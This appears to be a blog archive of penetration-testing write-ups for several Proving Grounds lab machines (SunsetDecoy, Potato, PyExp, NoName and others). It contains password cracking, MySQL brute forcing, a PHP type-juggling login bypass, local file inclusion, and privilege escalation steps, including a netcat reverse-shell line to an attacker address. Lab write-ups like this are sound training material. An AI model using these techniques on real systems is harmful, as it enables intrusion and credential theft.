Month: August 2021
pg-sunsetdecoy-play
SunsetDecoy
First up checking the root page for port 80 takes us to an index page containing a file called save.zip.
Upon downloading the file we are asked for a password to open. Kali comes pre-installed with a John
module called zip2john
. We can use this to create a hash of the file which can be used for cracking with John
.
┌──(kali㉿puckie)-[~/offsec/SunsetDecoy] └─$ zip2john save.zip > hash ver 2.0 efh 5455 efh 7875 save.zip/etc/passwd PKZIP Encr: 2b chk, TS_chk, cmplen=668, decmplen=1807, crc=B3ACDAFE ver 2.0 efh 5455 efh 7875 save.zip/etc/shadow PKZIP Encr: 2b chk, TS_chk, cmplen=434, decmplen=1111, crc=E11EC139 ver 2.0 efh 5455 efh 7875 save.zip/etc/group PKZIP Encr: 2b chk, TS_chk, cmplen=460, decmplen=829, crc=A1F81C08 ver 2.0 efh 5455 efh 7875 save.zip/etc/sudoers PKZIP Encr: 2b chk, TS_chk, cmplen=368, decmplen=669, crc=FF05389F ver 2.0 efh 5455 efh 7875 save.zip/etc/hosts PKZIP Encr: 2b chk, TS_chk, cmplen=140, decmplen=185, crc=DFB905CD ver 1.0 efh 5455 efh 7875 save.zip/etc/hostname PKZIP Encr: 2b chk, TS_chk, cmplen=45, decmplen=33, crc=D9C379A9 NOTE: It is assumed that all files in each archive have the same password. If that is not the case, the hash may be uncrackable. To avoid this, use option -o to pick a file at a time. ┌──(kali㉿puckie)-[~/offsec/SunsetDecoy] └─$ ls hash save.zip
We can then run John
against the hash.
┌──(kali㉿puckie)-[~/offsec/SunsetDecoy] └─$ john hash --wordlist=/usr/share/wordlists/rockyou.txt Using default input encoding: UTF-8 Loaded 1 password hash (PKZIP [32/64]) Will run 2 OpenMP threads Press 'q' or Ctrl-C to abort, almost any other key for status manuel (save.zip) 1g 0:00:00:00 DONE (2021-09-09 05:12) 50.00g/s 204800p/s 204800c/s 204800C/s 123456..oooooo Use the "--show" option to display all of the cracked passwords reliably Session completed ┌──(kali㉿puckie)-[~/offsec/SunsetDecoy]
We can then extract the contents of save.zip. After doing so we extract the /etc/ folder.
Out of these files shadow is of interest the most.
We have passwords hash for the root account and the account ‘296640a3b825115a47b68fc44501c828’. I was unable to crack the root password with a wordlist so instead was able to crack the other account after unshadow it
┌──(kali㉿puckie)-[~/offsec/SunsetDecoy/etc] └─$ john unshadowed.txt --wordlist=/usr/share/wordlists/rockyou.txt Using default input encoding: UTF-8 Loaded 2 password hashes with 2 different salts (sha512crypt, crypt(3) $6$ [SHA512 128/128 SSE2 2x]) Cost 1 (iteration count) is 5000 for all loaded hashes Will run 2 OpenMP threads Press 'q' or Ctrl-C to abort, almost any other key for status 0g 0:00:00:12 0.02% (ETA: 19:25:07) 0g/s 340.4p/s 680.9c/s 680.9C/s newzealand..blue13 0g 0:00:00:20 0.04% (ETA: 19:14:39) 0g/s 343.0p/s 686.0c/s 686.0C/s bethan..bagpuss server (296640a3b825115a47b68fc44501c828) 1g 0:00:03:08 0.63% (ETA: 13:41:37) 0.005317g/s 576.4p/s 667.0c/s 667.0C/s 222520..192522 1g 0:00:03:10 0.64% (ETA: 13:40:28) 0.005257g/s 577.3p/s 666.8c/s 666.8C/s sh3lby..sabong Use the "--show" option to display all of the cracked passwords reliably Session aborted
server
I was then able to login to SSH
with the username and password.┌──(kali㉿puckie)-[~/offsec/SunsetDecoy] └─$ ssh 296640a3b825115a47b68fc44501c828@192.168.187.85 -t "bash --noprofile" 296640a3b825115a47b68fc44501c828@192.168.187.85's password: server bash: dircolors: command not found 296640a3b825115a47b68fc44501c828@60832e9f188106ec5bcc4eb7709ce592:~$ id uid=1000(296640a3b825115a47b68fc44501c828) gid=1000(296640a3b825115a47b68fc44501c828) groups=1000(296640a3b825115a47b68fc44501c828) 296640a3b825115a47b68fc44501c828@60832e9f188106ec5bcc4eb7709ce592:~$
When attempting to run a simple command such as cat we are given the error message: -rbash: cat: command not found
.
We fix the $PATH with
296640a3b825115a47b68fc44501c828@60832e9f188106ec5bcc4eb7709ce592:/home$ export PATH="/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/local/games:/usr/games" 296640a3b825115a47b68fc44501c828@60832e9f188106ec5bcc4eb7709ce592:/home$ echo $PATH /usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/local/games:/usr/games 296640a3b825115a47b68fc44501c828@60832e9f188106ec5bcc4eb7709ce592:/home$ cd 296640a3b825115a47b68fc44501c828/ 296640a3b825115a47b68fc44501c828@60832e9f188106ec5bcc4eb7709ce592:~$ cat local.txt 5ffa884b32351d811cd1314c366c6098
Once in we have a more usable shell. We can then run a Python reverse shell to create another shell connection this should get us more usable.
Once in the new shell export a new path so we have use of commands easily.
After enumerating the machine for a while I was unable to find points of escalation. I then transferred over pspy64 and let it run.
Soon after running we get a huge amount of entries for chkrootkit-0.49.
Researching on Google shows a local privilege escalation exploit with this version and below:
Essentially this will execute a binary in /tmp/update. We can create update as a reverse shell and when executed should give us a root shell.
296640a3b825115a47b68fc44501c828@60832e9f188106ec5bcc4eb7709ce592:/tmp$ cat update /usr/bin/nc 192.168.49.187 4444 -e /bin/sh
Then open a netcat
listener to the specified port and we should land a root shell.
But Only after we start ( the file is in users’s home dir, so user has all permissions there)
296640a3b825115a47b68fc44501c828@60832e9f188106ec5bcc4eb7709ce592:~$ ls -la
total 60
drwxr-xr-x 3 296640a3b825115a47b68fc44501c828 296640a3b825115a47b68fc44501c828 4096 Sep 9 06:04 .
drwxr-xr-x 3 root root 4096 Jun 27 2020 ..
lrwxrwxrwx 1 root root 9 Jul 7 2020 .bash_history -> /dev/null
-rw-r--r-- 1 296640a3b825115a47b68fc44501c828 296640a3b825115a47b68fc44501c828 220 Jun 27 2020 .bash_logout
-rw-r--r-- 1 296640a3b825115a47b68fc44501c828 296640a3b825115a47b68fc44501c828 3583 Jun 27 2020 .bashrc
-rwxr-xr-x 1 root root 17480 Jul 7 2020 honeypot.decoy
-rw------- 1 root root 1855 Jul 7 2020 honeypot.decoy.cpp
296640a3b825115a47b68fc44501c828@60832e9f188106ec5bcc4eb7709ce592:~$ ./honeypot.decoy
--------------------------------------------------
Welcome to the Honey Pot administration manager (HPAM). Please select an option.
1 Date.
2 Calendar.
3 Shutdown.
4 Reboot.
5 Launch an AV Scan.
6 Check /etc/passwd.
7 Leave a note.
8 Check all services status.
Option selected:5
The AV Scan will be launched in a minute or less.
--------------------------------------------------
296640a3b825115a47b68fc44501c828@60832e9f188106ec5bcc4eb7709ce592:~$
.
┌──(kali㉿puckie)-[~/offsec] └─$ sudo nc -nlvp 4444 listening on [any] 4444 ... connect to [192.168.49.187] from (UNKNOWN) [192.168.187.85] 35942 id uid=0(root) gid=0(root) groups=0(root) ls -la total 36 drwx------ 3 root root 4096 Sep 9 05:07 . drwxr-xr-x 18 root root 4096 Jul 12 2020 .. lrwxrwxrwx 1 root root 9 Jul 7 2020 .bash_history -> /dev/null -rw-r--r-- 1 root root 570 Jan 31 2010 .bashrc drwxr-xr-x 2 296640a3b825115a47b68fc44501c828 296640a3b825115a47b68fc44501c828 4096 Jul 30 2009 chkrootkit-0.49 -rw-r--r-- 1 root root 148 Aug 17 2015 .profile -rw-r--r-- 1 root root 33 Sep 9 05:08 proof.txt -rw-r--r-- 1 root root 32 Aug 27 2020 root.txt -rw-r--r-- 1 root root 137 Jul 7 2020 script.sh -rw-r--r-- 1 root root 66 Jul 7 2020 .selected_editor cat proof.txt 80a4a1e86a9094a469a78902c269d6bb cat script.sh FILE=/dev/shm/STTY5246 if test -f "$FILE"; then /root/chkrootkit-0.49/chkrootkit else echo "An AV scan will not be launched." fi .
pwd /var/spool/cron/crontabs cat root # DO NOT EDIT THIS FILE - edit the master and reinstall. # (/tmp/crontab.V4fwaR/crontab installed on Tue Jul 7 16:44:59 2020) # (Cron version -- $Id: crontab.c,v 2.13 1994/01/17 03:20:37 vixie Exp $) # Edit this file to introduce tasks to be run by cron. --snip-- # For example, you can run a backup of all your user accounts # at 5 a.m every week with: # 0 5 * * 1 tar -zcf /var/backups/home.tgz /home/ # # For more information see the manual pages of crontab(5) and cron(8) # # m h dom mon dow command * * * * * /bin/bash /root/script.sh
pg-samurai-play
Samurai
Starting off on this machine we find that port 80 is restricted by a HTTP-basic-auth login.
I decided against bruteforcing for the moment and move straight on to other ports on the machine. Looking at port 445 for SMB I run enum4linux against the target and discovered some user accounts.
We have discovered the following users:
-
seppuku
-
samurai
-
tanto
Otherwise with no open shares on SMB we move onto enumerating port 7601 of which in the browser takes us to the following below:
Running dirsearch.py
against this port reveals the /keys/ directory.
Private and private.bak contain RSA keys. I moved the key over to my desktop, renamed to id_rsa and used chmod
to set appropriate permissions.
Knowing of the three users on the target machine we can guess and login to SSH
. I was able to login with the user tanto.
Once logged in as tanto we see we are restricted in rbash
and unable to run some commands. I used the following command sequence to first escape rbash
then export a new path then finally updated to a Python shell again.
Once we can move around the box again I moved into the seppuku users directory. The file .passwd is of interest and contains the password: 12345685213456!@!@A
This password did not work for the user seppku but I was able to use su
and the password to login as the user samurai.
I then transferred linpeas over to the attacking machine which soon picked up sudo permissions.
Open another tab and log in as tanto on SSH
again. The create the directory and file so we can execute as the user samurai. Once the directory and bin file has been created echo in a bash shell then chmod
to make it executable.
Then on our other tab execute the file with the following command to gain root shell:
pg-pyexp-play
PyExp
With only SSH
and MySQL
open we can start bruteforcing MySQL. As the root account generally always exists we can start by bruteforcing this using the rockyou.txt wordlist.
MySQL Credential Bruteforce
We will attempt to use the Medusa tool with the wordlist rockyou.txt to bruteforce MySQL password for the root user:
kali@kali:~/pyexp$ medusa -h 192.168.61.118 -M mysql -u root -P /usr/share/wordlists/rockyou.txt -t 40 -v 4 -f Medusa v2.2 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks <jmk@foofus.net> ACCOUNT FOUND: [mysql] Host: 192.168.61.118 User: root Password: prettywoman [SUCCESS] kali@kali:~/pyexp$
root:prettywoman
we can now login to MySQL.Viewing available databases we find the database ‘data’ which contains a table called ‘fernet’. This table contains a token and key as shown below.
The values are:
I tried decoding these with base64 and a few others. No luck with any legible output. Researching the words fernet and encode give us the following result: https://asecuritysite.com/encryption/ferdecode
Entering the details we have found give the results below.
These credentials returned are: lucy:wJ9`"Lemdv9[FEw-
Which allow us to login with SSH as the user lucy.
Checking sudo permissions with sudo -l
shows we can run /usr/bin/python2 /opt/exp.py
as root without specifying a password.
Reading the contents of /opt/exp.py:
Looks like this script will ask us a question which prompts raw input. If we can escape the shell whilst the script is active we should be able to maintain escalated privileges. Use the command below to escape the shell when prompted for input.
pg-potato-play
Exploitation Guide for Potato
Summary
This machine is exploited via bypassing PHP authentication, local file inclusion vulnerability, and weak user credentials. It is escalated by abusing misconfiguration of sudo permissions.
Enumeration
Nmap
We start off by running an nmap scan against all TCP ports:
kali@kali:~$ sudo nmap -p- 192.168.120.58 Starting Nmap 7.80 ( https://nmap.org ) at 2020-09-25 08:48 EDT Nmap scan report for 192.168.120.58 Host is up (0.038s latency). Not shown: 1997 closed ports PORT STATE SERVICE 22/tcp open ssh 80/tcp open http 2112/tcp open kip
We can further enumerate port 2112 with a more detailed scan:
kali@kali:~$ sudo nmap -p 2112 192.168.120.58 -sC -sV Starting Nmap 7.80 ( https://nmap.org ) at 2020-09-25 08:55 EDT Nmap scan report for 192.168.120.58 Host is up (0.030s latency). PORT STATE SERVICE VERSION 2112/tcp open ftp ProFTPD | ftp-anon: Anonymous FTP login allowed (FTP code 230) | -rw-r--r-- 1 ftp ftp 901 Aug 2 19:33 index.php.bak |_-rw-r--r-- 1 ftp ftp 54 Aug 2 18:17 welcome.msg
We see ProFTPD running on port 2112, and the server allows for anonymous authentication. In addition, we can see two files of interest: index.php.bak and welcome.msg.
Gobuster
Navigating to port 80 (http://192.168.120.58/) doesn’t show anything useful, but we can use gobuster to bruteforce the site’s directories:
kali@kali:~$ gobuster dir -u http://192.168.120.58 -w /usr/share/wordlists/dirb/common.txt -z =============================================================== Gobuster v3.0.1 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_) ... /.hta (Status: 403) /.htpasswd (Status: 403) /admin (Status: 301) /.htaccess (Status: 403) /index.php (Status: 200) /server-status (Status: 403) ...
This scan shows us the directory /admin. If we navigate there (http://192.168.120.58/admin/), we are greeted with a login control. Trying some easy or default passwords does not prove useful.
Exploitation
Anonymous FTP Server
Since we discovered that the ProFTPD server supports anonymous authentication and saw a couple of files hosted there, we can try retrieving them for inspection:
kali@kali:~$ ftp 192.168.120.58 2112 Connected to 192.168.120.58. 220 ProFTPD Server (Debian) [::ffff:192.168.120.58] Name (192.168.120.58:kali): anonymous 331 Anonymous login ok, send your complete email address as your password Password: 230-Welcome, archive user anonymous@192.168.118.3 ! ... ftp> ls 200 PORT command successful 150 Opening ASCII mode data connection for file list -rw-r--r-- 1 ftp ftp 901 Aug 2 19:33 index.php.bak -rw-r--r-- 1 ftp ftp 54 Aug 2 18:17 welcome.msg 226 Transfer complete ftp> ftp> get index.php.bak local: index.php.bak remote: index.php.bak 200 PORT command successful 150 Opening BINARY mode data connection for index.php.bak (901 bytes) 226 Transfer complete 901 bytes received in 0.00 secs (14.3210 MB/s) ftp> ftp> get welcome.msg local: welcome.msg remote: welcome.msg 200 PORT command successful 150 Opening BINARY mode data connection for welcome.msg (54 bytes) 226 Transfer complete 54 bytes received in 0.00 secs (994.9882 kB/s) ftp> ftp> bye 221 Goodbye. kali@kali:~$
File welcome.msg does not have anything of value to us; however, file index.php.bak does.
PHP Type Juggling and Authentication Bypass
The index backup file contains these lines of interest:
<?php
$pass= “potato”; //note Change this password regularly
if($_GET[‘login’]===”1″){
if (strcmp($_POST[‘username’], “admin”) == 0 && strcmp($_POST[‘password’], $pass) == 0) {
echo “Welcome! </br> Go to the <a href=\”dashboard.php\”>dashboard</a>”;
setcookie(‘pass’, $pass, time() + 365*24*3600);
}else{
echo “<p>Bad login/password! </br> Return to the <a href=\”index.php\”>login page</a> <p>”;
}
exit();
}
?>
Although we notice the default password in the statement$pass= “potato”;, the admin password has been changed. Of particular importance is line 10:
if (strcmp($_POST[‘username’], “admin”) == 0 && strcmp($_POST[‘password’], $pass) == 0) {
OWASP has a very informative document that explains a possible PHP type juggling attack vector against a check like this.
In PHP, there exist two types of comparisons: strict comparisons (that use syntax ===) and loose comparisons (that use syntax ==). The differences in their evaluation matter a great deal, especially where it concerns PHP Type Juggling.
Looking at the source code, we see the PHP string comparator function strcmp is used to compare the username to the string admin and the password to the variable $pass.
The function strcmp accepts two parameters, both of which must be of type string. If we play around with this function, we will notice that it really dislikes when the parameters are not strings. In particular, the function will give up and return NULL if a parameter is an array:
kali@kali:~$ php -a Interactive mode enabled php > $test = strcmp(array(), "password"); PHP Warning: strcmp() expects parameter 1 to be string, array given in php shell code on line 1 php > echo $test === NULL; 1 php >
Testing this further, we see that NULL actually equals the integer 0 when using loose comparison (==) – as is the case in the backup file:
php > echo (NULL == 0); 1 php >
Had the application employed strict comparisons, this vulnerability would not exist. Because we fully control the password POST variable $_POST[‘password’], we are able to intercept the request and change it to an empty array.
As a result, expression strcmp($_POST[‘password’], $pass) would evaluate to NULL and, because of the loose comparison, the check strcmp($_POST[‘password’], $pass) == 0 would pass, essentially bypassing authentication entirely.
Next, we will set up our web browser to use Burp proxy and intercept the login request:
POST /admin/index.php?login=1 HTTP/1.1
Host: 192.168.120.58
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.120.58/admin/index.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 27
Connection: close
Upgrade-Insecure-Requests: 1
username=admin&password=test
We will change the intercepted request to the following before forwarding it to the server:
POST /admin/index.php?login=1 HTTP/1.1
…
username=admin&password[]=””
As a result, we have successfully bypassed authentication and are redirected to http://192.168.120.58/admin/index.php?login=1, where we are greeted with the following:
Welcome!
Go to the dashboard
We will follow the link and navigate to the dashboard page (http://192.168.120.58/admin/dashboard.php) where we see five additional links: Home, Users, Date, Logs, and Ping.
LFI Vulnerability
Still using Burp proxy, we will investigate these pages while observing requests sent to the server. The Logs page (http://192.168.120.58/admin/dashboard.php?page=log) functionality should catch our attention. We see three log files listed here: log_01.txt, log_02.txt, and log_03.txt. If we select one of these logs and click Get the log button, the POST request would look like this:
POST /admin/dashboard.php?page=log HTTP/1.1
…
file=log_01.txt
We observe the file POST parameter in the request, and it hints at the possibility of a local file inclusion vulnerability. Swapping the intercepted POST data with file=../../../../../etc/passwd confirms this, and we get the contents of /etc/passwd:
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
…
ftp:x:113:65534::/srv/ftp:/usr/sbin/nologin
webadmin:$1$webadmin$3sXBxGUtDGIFAcnNTNhi6/:1001:1001:webadmin,,,:/home/webadmin:/bin/bash
Password Cracking
We will attempt to crack the recovered password hash for user webadmin with john and the default wordlist:
kali@kali:~$ cat pass.txt webadmin:$1$webadmin$3sXBxGUtDGIFAcnNTNhi6/:1001:1001:webadmin,,,:/home/webadmin:/bin/bash kali@kali:~$ kali@kali:~$ john pass.txt ... Proceeding with wordlist:/usr/share/john/password.lst, rules:Wordlist dragon (webadmin) 1g 0:00:00:00 DONE 2/3 (2020-09-25 10:08) 33.33g/s 35933p/s 35933c/s 35933C/s 123456..knight ...
The password cracker comes back with the password dragon.
SSH
We can now SSH into the machine with credentials webadmin:dragon:
kali@kali:~$ ssh webadmin@192.168.120.58 webadmin@192.168.120.58's password: Welcome to Ubuntu 20.04 LTS (GNU/Linux 5.4.0-42-generic x86_64) ... webadmin@serv:~$ id uid=1001(webadmin) gid=1001(webadmin) groups=1001(webadmin) webadmin@serv:~$
Escalation
Sudo Enumeration
Checking our sudo permissions shows that we are able to run all files in the /notes directory using /bin/nice:
webadmin@serv:~$ sudo -l [sudo] password for webadmin: Matching Defaults entries for webadmin on serv: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin User webadmin may run the following commands on serv: (ALL : ALL) /bin/nice /notes/* webadmin@serv:~$
Checking permissions on /notes, we are unable to write to that directory:
webadmin@serv:~$ ls -lah /notes/ total 16K drwxr-xr-x 2 root root 4.0K Aug 2 19:11 . drwxr-xr-x 21 root root 4.0K Sep 20 16:18 .. -rwx------ 1 root root 11 Aug 2 19:11 clear.sh -rwx------ 1 root root 8 Aug 2 19:11 id.sh webadmin@serv:~$
However, we can use a directory traversal trick to bypass this restriction. First, create a file in the home directory that we would like to run and give it executable permissions:
webadmin@serv:~$ pwd /home/webadmin webadmin@serv:~$ echo "/bin/bash" > pwn.sh webadmin@serv:~$ cat pwn.sh /bin/bash webadmin@serv:~$ chmod +x pwn.sh webadmin@serv:~$
We can now use the following path to our file, bypassing the directory write restriction and granting us a root shell:
webadmin@serv:~$ whoami webadmin webadmin@serv:~$ sudo /bin/nice /notes/../home/webadmin/pwn.sh root@serv:/home/webadmin# id uid=0(root) gid=0(root) groups=0(root) root@serv:/home/webadmin#
.
Explained:
root@serv:/# cat /etc/sudoers
#
# This file MUST be edited with the 'visudo' command as root.
#
# Please consider adding local content in /etc/sudoers.d/ instead of
# directly modifying this file.
#
# See the man page for details on how to write a sudoers file.
#
Defaults env_reset
Defaults mail_badpass
Defaults secure_path="/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin"
# Host alias specification
# User alias specification
# Cmnd alias specification
# User privilege specification
root ALL=(ALL:ALL) ALL
webadmin ALL=(ALL:ALL) /bin/nice /notes/*
# Members of the admin group may gain root privileges
%admin ALL=(ALL) ALL
# Allow members of group sudo to execute any command
%sudo ALL=(ALL:ALL) ALL
# See sudoers(5) for more information on "#include" directives:
#includedir /etc/sudoers.d
root@serv:/#
.
pg-photographer-play
Photographer
I started this box with checking SMB. First I ran the following command with smbclient
to list shares.
Taking note of the non default share ‘sambashare’ I connected with smbclient
again, this time specifying that share that has been identified. After connecting I tried to upload with the put
command and was given ‘access denied. I grabbed the two files on the share and then disconnected.
Checking the contents of mailsent.txt reveals a user ‘daisa’. We also have the sender who is called ‘agi’ who may be a potential user. The comment regarding the secret is interesting and something we may be able to use later.
I checked the contents of wordpress.bkg.zip and was unable to identify any interesting information. Unfortunately the archive file did not contain a wp-config.php file which normally contains database information.
Checking port 80 we come to a website called ‘photographer’. I ran directory enumeration on this page and enumerated manually and was unable to discover anything of interest.
Moving over to port 8000 we land on what is assumed to be the web page which was mention in Agi’s email to Daisa. Noting from the footer the website is built with Koken.
I checked manually for common directories and was presented with a login page under the directory /admin.
Knowing Daisa likely has account on this as per the email we grabbed from SMB I entered the email address as ‘daisa@photographer.com’. For the password I tried ‘babygirl’ which was hinted from the email as well. Fortunately this gave us access.
Using the settings tab we take note we are run on version 0.22.24.
A simple search with searchsploit reveals ‘Arbitrary File Upload (Authenticated)’ for this particular version.
The exploit for this has been linked below.
As per the exploit instructions I went to ‘Import Content’ in the bottom right of the page.
I then selected a PHP shell which I had renamed to phpshell.php.jpg in order to bypass the upload filter. After selecting and uploading I caught the upload request with Burpsuite
.
On the highlighted line above I removed ‘.jpg’ from the end of the file name. After forwarding the request go back to Koken and look under the ‘Date Published’ section and find the uploaded file. Highlight the file and select ‘Download File’ on the right.
This will execute the PHP reverse shell and we get a shell on our netcat
listener.
I then used the following command to make the shell more usable.
After this I uploaded linpeas
to the target machine and executed. Linpeas soon picking up the binary php7.2
has the SUID bit set.
Checking GTFOBins for SUID exploits we see the following:
Using this information I ran the following command to gain shell as root.
Keywords
pg-onsystemshelldredd-play
OnSystemShellDredd
FTP on the host is open to anonymous login. When logged in use ls -la
to view hidden files. Upon moving into the .hannah directory ensure binary mode is enabled then grab the id_rsa.
Ensure to change the permissions on the id_rsa to make it usable.
Then proceed to login as the user hannah specifying port 61000.
Running linpeas on the target machine after transferring over finds the binary cpulimit has a SUID bit set.
Checking GTFOBins against this binary reports the following:
We can then use the following command to gain a root shell:
pg-noname-play
NoName
Checking out the target address shows we land on a page headed ‘Fake Admin Area’. This page has a query box. I was unable to get any output from this or perform any command injection.
Further enumeration shows the /admin page being valid. This presents that page below.
Nothing interesting here but we do have something in the page source.
So far nowhere for this to be used but we can take a note of this. I decided from here to run some more specific enumeration against the target. Running dirsearch.py
to append .txt and .php to end of a wordlist I was able to identify the /superadmin.php webpage.
So far this looks the same as the other page almost but we can actually test to see if the ping function works.
Running tcpdump
on our attacking machine to listen in on the interface tun0 for ICMP packets we can ping our attacking machine and can confirm if we take receipt of ICMP packets.
Start tcpdump
:
Then after pinging our attacking machine from the web interface we see results which show ping is working.
Ideally we need to perform some form of command injection. Testing with the interface shows we need a IP at the begging of the command regardless. The linked GitHub has a large amount of command injection techniques to try: https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Command%20Injection
After some testing I found the following to work:
Switching over to Burpsuite
we can see the value 192.168.49.79 | id
was sent as a query and returned valid results in the response.
From here I ran the following command in a terminal to generate double base64 encoded output.
Then encoded the output combined with the ping part of the command with Burpsuite encoder.
Then submitted the URL encoded value as a parameter in Burpsuite
.
Resulting in a reverse shell on our netcat
listener.
From here I then transferred over linpeas
which after running found the binary ‘find’ has the SUID bit set.
Searching GTFOBins we find this can be used to spawn a root shell.
I then run the following command to gain a root shell.
pg-my-cmsms-play
My-CMSMS
Checking out port 80 takes us to the default page for CMS made simple.
I then run dirsearch.py against the host which also discovered phpmyadmin which was locked behind http-basic-auth.
I attempted to bruteforce the login for phpmyadmin and for CMSMS login. I was unable to find any valid credentials for either.
I was however, able to login to MySQL remotely with the credentials root:root
.
From here we can view the databases and move into the cmsms_db database.
Looking at the tables that exists in the database we select all columns from cms_users table.
This reveals a MD5 password hash for the admin account. I was unable to crack this with several word lists however.
As we are the root account on MySQL we can instead change the password to something we know and use this to login to CMSMS.
Run the following command to create a new password of ‘weakpass’ for the admin user:
update cms_users set password = (select md5(CONCAT(IFNULL((SELECT sitepref_value FROM cms_siteprefs WHERE sitepref_name = 'sitemask'),''),'weakpass'))) where username = 'admin'
The password has now changed:
We can then move over to the /admin/ directory in the browser and login with the new credentials.
Searching for exploits on CMSMS now that we are authenticated gives a few results.
As we are running version 2.2.13 I will try the Arbitary file upload for version 2.2.14.
Once the python script was downloaded I executed with the following syntax:
When ready I set a netcat
listener and prompted the script to continue resulting in a shell as www-data.
Moving around the target machine we have a .htpasswd file hidden in /var/www/html/admin/
. When running cat
on the file we get the value TUZaRzIzM1ZPSTVGRzJESk1WV0dJUUJSR0laUT09PT0=
.
From here we can decode with base64 then base32 as this string is double encoded.
We can then use su
to switch to the armour account and login with the password we have discovered.
Checking sudo -l
shows we can run python as root without declaring a password.
We can then spawn a root shell with python.
pg-jisctf-play
JISCTF
Checking out port 80 directs us to a login page on /login.php.
Running dirsearch.py
against the web server reveals robots.txt
The contents of robots.txt is shown below:
Browsing to /admin_area shows the page below.
Viewing the source reveals sensitive information:
We can then login to /login.php with the credentials shown above. The following page reveals a web page for uploading files.
I then uploaded a PHP reverse shell which after upload showed a ‘success’ status message. Knowing the directory /uploaded_files/ exists we can then browse to this followed by the uploaded files name: http://192.168.152.25/uploaded_files/phpshell.php.
The page should hang and we will receive a shell on our netcat
listener.
I could not see that Python was installed on this machine so I instead used the following command to upgrade the shell:
From here I transferred over linpeas
from my attacking machine and let it run. The script picks up the username ‘technawi’ which is an alternative user on the box.
Running cat
on the credentials.txt reveals login information. We can then use su
to switch to the technawi user.
Checking sudo -l
against the user reveals we can any command as any user on this machine.
We can then run the command below to spawn a root shell.